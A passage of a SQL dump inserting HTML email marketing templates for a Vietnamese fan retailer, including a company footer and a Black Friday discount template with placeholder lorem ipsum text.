\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 150%;\\\\\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: <a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"mailto:sale@hogiaphat.vn\\\\\\\" target=\\\\\\\"_blank\\\\\\\">sale@hogiaphat.vn\\u00a0<\\/a><\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">-----------o0o------------<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<br \\/>\\u00a0<br \\/>\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\"><strong>C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<\\/strong><br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"UkkBWxvzv8\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"otIuyp2NLU\\\",\\\"contents\\\":[{\\\"id\\\":\\\"3YxPW0zruG\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Too many emails?\\u00a0<a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL2xpZW4taGUiLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"> <span style=\\\\\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\\\\\">Unsubscribe<\\/span><\\/a><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#a47e6b\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#236fa1\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":13}\"', '', 1, '2023-03-09 11:11:09');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(13, 'KM Mar-2023 - Discount', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: calc(100% - 40px) !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700&display=swap\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #f5f5f5;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #f5f5f5;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #f5f5f5;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 10px;background-color: #242424\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 10px;background-color: #242424;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px 20px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502399458599-adada_36.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 146px;\\\" width=\\\"146\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px 10px;background-image: url(\'https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\');background-repeat: repeat;background-position: center top;background-color: #242424\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #e01223;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px 10px;background-image: url(\'https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\');background-repeat: repeat;background-position: center top;background-color: #242424;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #e01223;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 20px 0px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 100%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 100%;\\\"><span style=\\\"font-family: impact, chicago; font-size: 72px; line-height: 72px;\\\"><strong><span style=\\\"line-height: 72px; color: #ffffff; font-size: 72px;\\\"><span style=\\\"line-height: 72px; font-size: 72px;\\\">BLACK<\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 100%;\\\"><span style=\\\"font-family: impact, chicago; font-size: 72px; line-height: 72px;\\\"><strong><span style=\\\"line-height: 72px; color: #ffffff; font-size: 72px;\\\"><span style=\\\"line-height: 72px; font-size: 72px;\\\">FRIDAY<\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:9px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396368642-s2ss_31.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 247px;\\\" width=\\\"247\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 20px 35px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 120%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><span style=\\\"font-size: 36px; line-height: 43.2px; color: #ffffff; font-family: Lato, sans-serif;\\\">25<span style=\\\"font-size: 14px; line-height: 16.8px;\\\">TH<\\/span> NOVEMBER<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 10px;background-image: url(\'https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\');background-repeat: repeat;background-position: center top;background-color: #242424\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 10px;background-image: url(\'https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\');background-repeat: repeat;background-position: center top;background-color: #242424;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:21px 15px 8px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 120%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><span style=\\\"font-family: impact, chicago; font-size: 34px; line-height: 40.8px;\\\">START FROM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 120%;\\\"><span style=\\\"font-family: impact, chicago; font-size: 48px; line-height: 57.6px;\\\">40% OFF<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"33%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #CCC;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 130%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 130%;\\\"><span style=\\\"font-size: 12px; line-height: 15.6px;\\\">Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium,<span style=\\\"color: #e01223; font-size: 12px; line-height: 15.6px;\\\"><strong> totam rem<\\/strong><\\/span> aperiam, eaque ipsa quae ab illo <span style=\\\"font-size: 14px; line-height: 18.2px; color: #e01223;\\\"><strong>inventore<\\/strong> <\\/span>veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia <span style=\\\"font-size: 14px; line-height: 18.2px; color: #e01223;\\\"><strong>voluptas sit aspernatur<\\/strong> <\\/span>aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"33%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #CCC;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  